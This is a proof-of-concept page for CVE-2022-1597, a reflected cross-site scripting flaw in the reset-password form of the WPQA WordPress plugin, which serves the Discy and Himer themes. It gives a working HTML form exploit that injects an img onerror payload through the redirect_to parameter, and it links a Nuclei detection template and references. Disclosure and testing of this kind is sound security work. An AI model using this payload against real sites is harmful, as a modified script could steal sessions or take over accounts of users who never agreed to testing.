CVE-2022-1597 PoC — WordPress plugin WPQA 跨站脚本漏洞

Source

Associated Vulnerability

Description

 The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks

Readme

# CVE-2022-1597
 The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks

## Affected Plugins:
[WPQA](https://codecanyon.net/item/wpqa-builder-forms-addon-for-wordpress/25298161) < 5.4

## Affected Themes:
[DISCY](https://2code.info/discy-social-questions-and-answers-wordpress-theme/)

[HIMER](https://2code.info/himer-social-questions-and-answers-wordpress-theme/)

## POC:

```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="user&#95;mail" value="validEmail@domain.com" />
      <input type="hidden" name="form&#95;type" value="wpqa&#95;forget" />
      <input type="hidden" name="action" value="wpqa&#95;ajax&#95;password&#95;process" />
      <input type="hidden" name="redirect&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
## Nuclei Template:
[CVE-2022-1597.yaml](CVE-2022-1597.yaml)

![NUCLEI](files/photo.png)

## VIDEO POC:
https://www.youtube.com/watch?v=E2GRtf6prq8

### References:
https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597

File Snapshot

 [4.0K]  /data/pocs/66065d06940f84a6799bf164b569779192c27945
├── [1.8K]  CVE-2022-1597.yaml
├── [4.0K]  files
│   └── [1.4M]  photo.png
└── [1.4K]  README.md

1 directory, 3 files

Remarks